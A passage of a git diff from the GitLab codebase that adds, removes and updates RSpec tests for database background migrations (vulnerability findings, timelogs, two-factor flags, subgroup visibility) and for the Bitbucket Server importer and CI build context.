"#{group.path}/#{subgroup.path}/test") } - let!(:snippet1) { create_snippet(1, project1) } - - it 'updates the root namespace statistics' do - subject - - expect(snippet_statistics.count).to eq 1 - expect(project_stats1.snippets_size).to eq snippet_statistics.first.repository_size - expect(namespace_statistics.find_by(namespace_id: subgroup.id)).to be_nil - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size - end - end - - context 'when a snippet repository is empty' do - let!(:snippet1) { create_snippet(1, project1, with_repo: false) } - let!(:snippet2) { create_snippet(2, project1) } - - it 'logs error and continues execution' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Invalid snippet repository/).once - end - - subject - - expect(snippet_statistics.find_by(snippet_id: snippet1.id)).to be_nil - expect(project_stats1.snippets_size).to eq snippet_statistics.find(snippet2.id).repository_size - end - end - - def create_snippet(id, project, with_repo: true) - snippets.create!(id: id, type: 'ProjectSnippet', project_id: project.id, author_id: user.id, file_name: file_name, content: content).tap do |snippet| - if with_repo - allow(snippet).to receive(:disk_path).and_return(disk_path(snippet)) - - raw_repository(snippet).create_repository - - TestEnv.copy_repo(snippet, - bare_repo: TestEnv.factory_repo_path_bare, - refs: TestEnv::BRANCH_SHA) - end - end - end - - def create_project(id, name, namespace, path = nil) - projects.create!(id: id, name: name, path: name.downcase.gsub(/\s/, '_'), namespace_id: namespace.id).tap do |project| - path ||= "#{namespace.path}/#{project.path}" - routes.create!(id: id, source_type: 'Project', source_id: project.id, path: path) - end - end - - def create_snippet_statistics(snippet_id, repository_size = 0) - snippet_statistics.create!(snippet_id: snippet_id, repository_size: repository_size) - end - - def create_project_statistics(project, snippets_size = nil) - project_statistics.create!(id: project.id, project_id: project.id, namespace_id: project.namespace_id, snippets_size: snippets_size) - end - - def raw_repository(snippet) - Gitlab::Git::Repository.new('default', - "#{disk_path(snippet)}.git", - Gitlab::GlRepository::SNIPPET.identifier_for_container(snippet), - "@snippets/#{snippet.id}") - end - - def hashed_repository(snippet) - Storage::Hashed.new(snippet, prefix: '@snippets') - end - - def disk_path(snippet) - hashed_repository(snippet).disk_path - end -end diff --git a/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb b/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb deleted file mode 100644 index 1830a7fc099..00000000000 --- a/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb +++ /dev/null @@ -1,38 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::RecalculateProjectAuthorizationsWithMinMaxUserId, schema: 20181228175414 do - let(:users_table) { table(:users) } - let(:min) { 1 } - let(:max) { 5 } - - before do - min.upto(max) do |i| - users_table.create!(id: i, email: "user#{i}@example.com", projects_limit: 10) - end - end - - describe '#perform' do - it 'initializes Users::RefreshAuthorizedProjectsService with correct users' do - min.upto(max) do |i| - user = User.find(i) - expect(Users::RefreshAuthorizedProjectsService).to( - receive(:new).with(user, any_args).and_call_original) - end - - described_class.new.perform(min, max) - end - - it 'executes Users::RefreshAuthorizedProjectsService' do - expected_call_counts = max - min + 1 - - service = instance_double(Users::RefreshAuthorizedProjectsService) - expect(Users::RefreshAuthorizedProjectsService).to( - receive(:new).exactly(expected_call_counts).times.and_return(service)) - expect(service).to receive(:execute).exactly(expected_call_counts).times - - described_class.new.perform(min, max) - end - end -end diff --git a/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb b/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb new file mode 100644 index 00000000000..28aa9efde4f --- /dev/null +++ b/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb @@ -0,0 +1,175 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::RemoveOccurrencePipelinesAndDuplicateVulnerabilitiesFindings do + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } + let(:users) { table(:users) } + let(:user) { create_user! } + let(:project) { table(:projects).create!(id: 14219619, namespace_id: namespace.id) } + let(:scanners) { table(:vulnerability_scanners) } + let!(:scanner1) { scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + let!(:scanner2) { scanners.create!(project_id: project.id, external_id: 'test 2', name: 'test scanner 2') } + let!(:scanner3) { scanners.create!(project_id: project.id, external_id: 'test 3', name: 'test scanner 3') } + let!(:unrelated_scanner) { scanners.create!(project_id: project.id, external_id: 'unreleated_scanner', name: 'unrelated scanner') } + let(:vulnerabilities) { table(:vulnerabilities) } + let(:vulnerability_findings) { table(:vulnerability_occurrences) } + let(:vulnerability_finding_pipelines) { table(:vulnerability_occurrence_pipelines) } + let(:vulnerability_identifiers) { table(:vulnerability_identifiers) } + let(:vulnerability_identifier) do + vulnerability_identifiers.create!( + id: 1244459, + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '0a203e8cd5260a1948edbedc76c7cb91ad6a2e45', + name: 'vulnerability identifier') + end + + let!(:vulnerability_for_first_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:first_finding_duplicate) do + create_finding!( + id: 5606961, + uuid: "bd95c085-71aa-51d7-9bb6-08ae669c262e", + vulnerability_id: vulnerability_for_first_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner1.id, + project_id: project.id + ) + end + + let!(:vulnerability_for_second_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:second_finding_duplicate) do + create_finding!( + id: 8765432, + uuid: "5b714f58-1176-5b26-8fd5-e11dfcb031b5", + vulnerability_id: vulnerability_for_second_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner2.id, + project_id: project.id + ) + end + + let!(:vulnerability_for_third_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:third_finding_duplicate) do + create_finding!( + id: 8832995, + uuid: "cfe435fa-b25b-5199-a56d-7b007cc9e2d4", + vulnerability_id: vulnerability_for_third_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner3.id, + project_id: project.id + ) + end + + let!(:unrelated_finding) do + create_finding!( + id: 9999999, + uuid: "unreleated_finding", + vulnerability_id: nil, + report_type: 1, + location_fingerprint: 'random_location_fingerprint', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: unrelated_scanner.id, + project_id: project.id + ) + end + + subject { described_class.new.perform(first_finding_duplicate.id, unrelated_finding.id) } + + before do + 4.times do + create_finding_pipeline!(project_id: project.id, finding_id: first_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: second_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: third_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: unrelated_finding.id) + end + end + + it 'removes Vulnerabilities::OccurrencePipelines for matching Vulnerabilities::Finding' do + expect(vulnerability_findings.count).to eq(4) + expect(vulnerability_finding_pipelines.count).to eq(16) + + expect { subject }.to change(vulnerability_finding_pipelines, :count).from(16).to(8) + .and change(vulnerability_findings, :count).from(4).to(2) + end + + private + + def create_vulnerability!(project_id:, author_id:, title: 'test', severity: 7, confidence: 7, report_type: 0) + vulnerabilities.create!( + project_id: project_id, + author_id: author_id, + title: title, + severity: severity, + confidence: confidence, + report_type: report_type + ) + end + + # rubocop:disable Metrics/ParameterLists + def create_finding!( + id: nil, + vulnerability_id:, project_id:, scanner_id:, primary_identifier_id:, + name: "test", severity: 7, confidence: 7, report_type: 0, + project_fingerprint: '123qweasdzxc', location_fingerprint: 'test', + metadata_version: 'test', raw_metadata: 'test', uuid: 'test') + params = { + vulnerability_id: vulnerability_id, + project_id: project_id, + name: name, + severity: severity, + confidence: confidence, + report_type: report_type, + project_fingerprint: project_fingerprint, + scanner_id: scanner_id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: location_fingerprint, + metadata_version: metadata_version, + raw_metadata: raw_metadata, + uuid: uuid + } + params[:id] = id unless id.nil? + vulnerability_findings.create!(params) + end + # rubocop:enable Metrics/ParameterLists + + def create_user!(name: "Example User", email: "user@example.com", user_type: nil, created_at: Time.zone.now, confirmed_at: Time.zone.now) + table(:users).create!( + name: name, + email: email, + username: name, + projects_limit: 0, + user_type: user_type, + confirmed_at: confirmed_at + ) + end + + def create_finding_pipeline!(project_id:, finding_id:) + pipeline = table(:ci_pipelines).create!(project_id: project_id) + vulnerability_finding_pipelines.create!(pipeline_id: pipeline.id, occurrence_id: finding_id) + end +end diff --git a/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb b/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb new file mode 100644 index 00000000000..fadee64886f --- /dev/null +++ b/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb @@ -0,0 +1,66 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::RemoveVulnerabilityFindingLinks, :migration, schema: 20211104165220 do + let(:vulnerability_findings) { table(:vulnerability_occurrences) } + let(:finding_links) { table(:vulnerability_finding_links) } + + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let(:project) { table(:projects).create!(namespace_id: namespace.id) } + let(:scanner) { table(:vulnerability_scanners).create!(project_id: project.id, external_id: 'scanner', name: 'scanner') } + let(:vulnerability_identifier) do + table(:vulnerability_identifiers).create!( + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '7e394d1b1eb461a7406d7b1e08f057a1cf11287a', + name: 'vulnerability identifier') + end + + # vulnerability findings + let!(:findings) do + Array.new(2) do |id| + vulnerability_findings.create!( + project_id: project.id, + name: 'Vulnerability Name', + severity: 7, + confidence: 7, + report_type: 0, + project_fingerprint: '123qweasdzxc', + scanner_id: scanner.id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: "location_fingerprint_#{id}", + metadata_version: 'metadata_version', + raw_metadata: 'raw_metadata', + uuid: "uuid_#{id}" + ) + end + end + + # vulnerability finding links + let!(:links) do + { + findings.first => Array.new(5) { |id| finding_links.create!(vulnerability_occurrence_id: findings.first.id, name: "Link Name 1", url: "link_url1.example") }, + findings.second => Array.new(5) { |id| finding_links.create!(vulnerability_occurrence_id: findings.second.id, name: "Link Name 2", url: "link_url2.example") } + } + end + + it 'removes vulnerability links' do + expect do + subject.perform(links[findings.first].first.id, links[findings.second].last.id) + end.to change { finding_links.count }.from(10).to(0) + + expect(finding_links.all).to be_empty + end + + it 'only deletes vulnerability links for the current batch' do + expected_links = [finding_links.where(vulnerability_occurrence_id: findings.second.id)].flatten + + expect do + subject.perform(links[findings.first].first.id, links[findings.first].last.id) + end.to change { finding_links.count }.from(10).to(5) + + expect(finding_links.all).to match_array(expected_links) + end +end diff --git a/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb b/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb deleted file mode 100644 index 6cfdbb5a14e..00000000000 --- a/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb +++ /dev/null @@ -1,42 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::ReplaceBlockedByLinks, schema: 20181228175414 do - let(:namespace) { table(:namespaces).create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { table(:projects).create!(namespace_id: namespace.id, name: 'gitlab') } - let(:issue1) { table(:issues).create!(project_id: project.id, title: 'a') } - let(:issue2) { table(:issues).create!(project_id: project.id, title: 'b') } - let(:issue3) { table(:issues).create!(project_id: project.id, title: 'c') } - let(:issue_links) { table(:issue_links) } - let!(:blocked_link1) { issue_links.create!(source_id: issue2.id, target_id: issue1.id, link_type: 2) } - let!(:opposite_link1) { issue_links.create!(source_id: issue1.id, target_id: issue2.id, link_type: 1) } - let!(:blocked_link2) { issue_links.create!(source_id: issue1.id, target_id: issue3.id, link_type: 2) } - let!(:opposite_link2) { issue_links.create!(source_id: issue3.id, target_id: issue1.id, link_type: 0) } - let!(:nochange_link) { issue_links.create!(source_id: issue2.id, target_id: issue3.id, link_type: 1) } - - subject { described_class.new.perform(issue_links.minimum(:id), issue_links.maximum(:id)) } - - it 'deletes any opposite relations' do - subject - - expect(issue_links.ids).to match_array([nochange_link.id, blocked_link1.id, blocked_link2.id]) - end - - it 'ignores issue links other than blocked_by' do - subject - - expect(nochange_link.reload.link_type).to eq(1) - end - - it 'updates blocked_by issue links' do - subject - - expect(blocked_link1.reload.link_type).to eq(1) - expect(blocked_link1.source_id).to eq(issue1.id) - expect(blocked_link1.target_id).to eq(issue2.id) - expect(blocked_link2.reload.link_type).to eq(1) - expect(blocked_link2.source_id).to eq(issue3.id) - expect(blocked_link2.target_id).to eq(issue1.id) - end -end diff --git a/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb b/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb deleted file mode 100644 index 2f5074649c4..00000000000 --- a/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb +++ /dev/null @@ -1,48 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::ResetMergeStatus do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:merge_requests) { table(:merge_requests) } - - def create_merge_request(id, extra_params = {}) - params = { - id: id, - target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: "mr name#{id}" - }.merge(extra_params) - - merge_requests.create!(params) - end - - it 'correctly updates opened mergeable MRs to unchecked' do - create_merge_request(1, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(2, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(3, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(4, state_id: MergeRequest.available_states[:merged], merge_status: 'can_be_merged') - create_merge_request(5, state_id: MergeRequest.available_states[:opened], merge_status: 'cannot_be_merged') - - subject.perform(1, 5) - - expected_rows = [ - { id: 1, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 2, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 3, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 4, state_id: MergeRequest.available_states[:merged], merge_status: 'can_be_merged' }, - { id: 5, state_id: MergeRequest.available_states[:opened], merge_status: 'cannot_be_merged' } - ] - - rows = merge_requests.order(:id).map do |row| - row.attributes.slice('id', 'state_id', 'merge_status').symbolize_keys - end - - expect(rows).to eq(expected_rows) - end -end diff --git a/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb b/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb deleted file mode 100644 index ef90b5674f0..00000000000 --- a/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb +++ /dev/null @@ -1,35 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::ResetSharedRunnersForTransferredProjects, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - let(:namespace_1) { namespaces.create!(name: 'foo', path: 'foo', shared_runners_enabled: true, allow_descendants_override_disabled_shared_runners: false ) } - let(:namespace_2) { namespaces.create!(name: 'foo', path: 'foo', shared_runners_enabled: false, allow_descendants_override_disabled_shared_runners: false ) } - let(:namespace_3) { namespaces.create!(name: 'bar', path: 'bar', shared_runners_enabled: false, allow_descendants_override_disabled_shared_runners: true ) } - let(:project_1_1) { projects.create!(namespace_id: namespace_1.id, shared_runners_enabled: true) } - let(:project_1_2) { projects.create!(namespace_id: namespace_1.id, shared_runners_enabled: false) } - let(:project_2_1) { projects.create!(namespace_id: namespace_2.id, shared_runners_enabled: true) } - let(:project_2_2) { projects.create!(namespace_id: namespace_2.id, shared_runners_enabled: false) } - let(:project_3_1) { projects.create!(namespace_id: namespace_3.id, shared_runners_enabled: true) } - let(:project_3_2) { projects.create!(namespace_id: namespace_3.id, shared_runners_enabled: false) } - - it 'corrects each project shared_runners_enabled column' do - expect do - described_class.new.perform(namespace_1.id, namespace_3.id) - project_1_1.reload - project_1_2.reload - project_2_1.reload - project_2_2.reload - project_3_1.reload - project_3_2.reload - end.to not_change(project_1_1, :shared_runners_enabled).from(true) - .and not_change(project_1_2, :shared_runners_enabled).from(false) - .and change(project_2_1, :shared_runners_enabled).from(true).to(false) - .and not_change(project_2_2, :shared_runners_enabled).from(false) - .and not_change(project_3_1, :shared_runners_enabled).from(true) - .and not_change(project_3_2, :shared_runners_enabled).from(false) - end -end diff --git a/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb b/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb deleted file mode 100644 index 1fdbdf25706..00000000000 --- a/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb +++ /dev/null @@ -1,51 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::SetMergeRequestDiffFilesCount, schema: 20181228175414 do - let(:merge_request_diff_files) { table(:merge_request_diff_files) } - let(:merge_request_diffs) { table(:merge_request_diffs) } - let(:merge_requests) { table(:merge_requests) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - let(:namespace) { namespaces.create!(name: 'foo', path: 'foo') } - let(:project) { projects.create!(namespace_id: namespace.id) } - let(:merge_request) { merge_requests.create!(source_branch: 'x', target_branch: 'master', target_project_id: project.id) } - - let!(:empty_diff) { merge_request_diffs.create!(merge_request_id: merge_request.id) } - let!(:filled_diff) { merge_request_diffs.create!(merge_request_id: merge_request.id) } - - let!(:filled_diff_files) do - 1.upto(3).map do |n| - merge_request_diff_files.create!( - merge_request_diff_id: filled_diff.id, - relative_order: n, - new_file: false, - renamed_file: false, - deleted_file: false, - too_large: false, - a_mode: '', - b_mode: '', - old_path: '', - new_path: '' - ) - end - end - - it 'fills the files_count column' do - described_class.new.perform(empty_diff.id, filled_diff.id) - - expect(empty_diff.reload.files_count).to eq(0) - expect(filled_diff.reload.files_count).to eq(3) - end - - it 'uses the sentinel value if the actual count is too high' do - stub_const("#{described_class}::FILES_COUNT_SENTINEL", filled_diff_files.size - 1) - - described_class.new.perform(empty_diff.id, filled_diff.id) - - expect(empty_diff.reload.files_count).to eq(0) - expect(filled_diff.reload.files_count).to eq(described_class::FILES_COUNT_SENTINEL) - end -end diff --git a/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb b/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb deleted file mode 100644 index de9799c3642..00000000000 --- a/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UpdateExistingSubgroupToMatchVisibilityLevelOfParent, schema: 20181228175414 do - include MigrationHelpers::NamespacesHelpers - - context 'private visibility level' do - it 'updates the project visibility' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - - expect { subject.perform([parent.id], Gitlab::VisibilityLevel::PRIVATE) }.to change { child.reload.visibility_level }.to(Gitlab::VisibilityLevel::PRIVATE) - end - - it 'updates sub-sub groups' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - middle_group = create_namespace('middle', Gitlab::VisibilityLevel::PRIVATE, parent_id: parent.id) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: middle_group.id) - - subject.perform([parent.id, middle_group.id], Gitlab::VisibilityLevel::PRIVATE) - - expect(child.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - end - - it 'updates all sub groups' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - middle_group = create_namespace('middle', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: middle_group.id) - - subject.perform([parent.id], Gitlab::VisibilityLevel::PRIVATE) - - expect(child.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - expect(middle_group.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - end - end - - context 'internal visibility level' do - it 'updates the project visibility' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::INTERNAL) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - - expect { subject.perform([parent.id], Gitlab::VisibilityLevel::INTERNAL) }.to change { child.reload.visibility_level }.to(Gitlab::VisibilityLevel::INTERNAL) - end - end -end diff --git a/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb b/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb deleted file mode 100644 index 33f5e38100e..00000000000 --- a/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb +++ /dev/null @@ -1,74 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UpdateExistingUsersThatRequireTwoFactorAuth, schema: 20181228175414 do - include MigrationHelpers::NamespacesHelpers - - let(:group_with_2fa_parent) { create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) } - let(:group_with_2fa_child) { create_namespace('child', Gitlab::VisibilityLevel::PRIVATE, parent_id: group_with_2fa_parent.id) } - let(:members_table) { table(:members) } - let(:users_table) { table(:users) } - - subject { described_class.new } - - describe '#perform' do - context 'with group members' do - let(:user_1) { create_user('user@example.com') } - let!(:member) { create_group_member(user_1, group_with_2fa_parent) } - let!(:user_without_group) { create_user('user_without@example.com') } - let(:user_other) { create_user('user_other@example.com') } - let!(:member_other) { create_group_member(user_other, group_with_2fa_parent) } - - it 'updates user when user should not be required to establish two factor authentication' do - subject.perform(user_1.id, user_without_group.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(false) - end - - it 'does not update user when user is member of group that requires two factor authentication' do - group = create_namespace('other', Gitlab::VisibilityLevel::PRIVATE, require_two_factor_authentication: true) - create_group_member(user_1, group) - - subject.perform(user_1.id, user_without_group.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'does not update user who is not in current batch' do - subject.perform(user_1.id, user_without_group.id) - - expect(user_other.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'updates all users in current batch' do - subject.perform(user_1.id, user_other.id) - - expect(user_other.reload.require_two_factor_authentication_from_group).to eq(false) - end - - it 'does not update user when user is member of group which parent group requires two factor authentication' do - group_with_2fa_parent.update!(require_two_factor_authentication: true) - subject.perform(user_1.id, user_other.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'does not update user when user is member of group which has subgroup that requires two factor authentication' do - create_namespace('subgroup', Gitlab::VisibilityLevel::PRIVATE, require_two_factor_authentication: true, parent_id: group_with_2fa_child.id) - - subject.perform(user_1.id, user_other.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - end - end - - def create_user(email, require_2fa: true) - users_table.create!(email: email, projects_limit: 10, require_two_factor_authentication_from_group: require_2fa) - end - - def create_group_member(user, group) - members_table.create!(user_id: user.id, source_id: group.id, access_level: GroupMember::MAINTAINER, source_type: "Namespace", type: "GroupMember", notification_level: 3) - end -end diff --git a/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb b/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb new file mode 100644 index 00000000000..982e3319063 --- /dev/null +++ b/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::UpdateTimelogsNullSpentAt, schema: 20211215090620 do + let_it_be(:previous_time) { 10.days.ago } + let_it_be(:namespace) { table(:namespaces).create!(name: 'namespace', path: 'namespace') } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + let_it_be(:issue) { table(:issues).create!(project_id: project.id) } + let_it_be(:merge_request) { table(:merge_requests).create!(target_project_id: project.id, source_branch: 'master', target_branch: 'feature') } + let_it_be(:timelog1) { create_timelog!(issue_id: issue.id) } + let_it_be(:timelog2) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog3) { create_timelog!(issue_id: issue.id, spent_at: previous_time) } + let_it_be(:timelog4) { create_timelog!(merge_request_id: merge_request.id, spent_at: previous_time) } + + subject(:background_migration) { described_class.new } + + before_all do + table(:timelogs).where.not(id: [timelog3.id, timelog4.id]).update_all(spent_at: nil) + end + + describe '#perform' do + it 'sets correct spent_at' do + background_migration.perform(timelog1.id, timelog4.id) + + expect(timelog1.reload.spent_at).to be_like_time(timelog1.created_at) + expect(timelog2.reload.spent_at).to be_like_time(timelog2.created_at) + expect(timelog3.reload.spent_at).to be_like_time(previous_time) + expect(timelog4.reload.spent_at).to be_like_time(previous_time) + expect(timelog3.reload.spent_at).not_to be_like_time(timelog3.created_at) + expect(timelog4.reload.spent_at).not_to be_like_time(timelog4.created_at) + end + end + + private + + def create_timelog!(**args) + table(:timelogs).create!(**args, time_spent: 1) + end +end diff --git a/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb b/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb deleted file mode 100644 index 7af11ffa1e0..00000000000 --- a/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb +++ /dev/null @@ -1,15 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UserMentions::CreateResourceUserMention, schema: 20181228175414 do - context 'checks no_quote_columns' do - it 'has correct no_quote_columns' do - expect(Gitlab::BackgroundMigration::UserMentions::Models::MergeRequest.no_quote_columns).to match([:note_id, :merge_request_id]) - end - - it 'commit has correct no_quote_columns' do - expect(Gitlab::BackgroundMigration::UserMentions::Models::Commit.no_quote_columns).to match([:note_id]) - end - end -end diff --git a/spec/lib/gitlab/background_migration_spec.rb b/spec/lib/gitlab/background_migration_spec.rb index 777dc8112a7..8dd7f6892a6 100644 --- a/spec/lib/gitlab/background_migration_spec.rb +++ b/spec/lib/gitlab/background_migration_spec.rb @@ -3,11 +3,12 @@ require 'spec_helper' RSpec.describe Gitlab::BackgroundMigration do - let(:coordinator) { described_class::JobCoordinator.for_database(:main) } + let(:default_tracking_database) { described_class::DEFAULT_TRACKING_DATABASE } + let(:coordinator) { described_class::JobCoordinator.for_tracking_database(default_tracking_database) } before do allow(described_class).to receive(:coordinator_for_database) - .with(:main) + .with(default_tracking_database) .and_return(coordinator) end diff --git a/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb b/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb index f9313f0ff28..0380ddd9a2e 100644 --- a/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb +++ b/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb @@ -27,20 +27,26 @@ RSpec.describe Gitlab::BitbucketServerImport::Importer do end describe '#import_repository' do + let(:repo_url) { 'http://bitbucket:test@my-bitbucket' } + + before do + expect(project.repository).to receive(:import_repository).with(repo_url) + end + it 'adds a remote' do expect(subject).to receive(:import_pull_requests) expect(subject).to receive(:delete_temp_branches) expect(project.repository).to receive(:fetch_as_mirror) - .with('http://bitbucket:test@my-bitbucket', - refmap: [:heads, :tags, '+refs/pull-requests/*/to:refs/merge-requests/*/head']) + .with(repo_url, + refmap: ['+refs/pull-requests/*/to:refs/merge-requests/*/head']) subject.execute end - it 'raises a Gitlab::Shell exception in the fetch' do - expect(project.repository).to receive(:fetch_as_mirror).and_raise(Gitlab::Shell::Error) + it 'raises a Gitlab::Git::CommandError in the fetch' do + expect(project.repository).to receive(:fetch_as_mirror).and_raise(::Gitlab::Git::CommandError) - expect { subject.execute }.to raise_error(Gitlab::Shell::Error) + expect { subject.execute }.to raise_error(::Gitlab::Git::CommandError) end it 'raises an unhandled exception in the fetch' do diff --git a/spec/lib/gitlab/ci/build/context/build_spec.rb b/spec/lib/gitlab/ci/build/context/build_spec.rb index 46447231424..7f862a3b80a 100644 --- a/spec/lib/gitlab/ci/build/context/build_spec.rb +++ b/spec/lib/gitlab/ci/build/context/build_spec.rb @@ -8,11 +8,7 @@ RSpec.describe Gitlab::Ci::Build::Context::Build do let(:context) { described_class.new(pipeline, seed_attributes) } - describe '#variables' do - subject { context.variables.to_hash } - - it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } - + shared_examples 'variables collection' do it { is_expected.to include('CI_COMMIT_REF_NAME' => 'master') } it { is_expected.to include('CI_PIPELINE_IID' => pipeline.iid.to_s) } it { is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } @@ -27,4 +23,20 @@ RSpec.describe 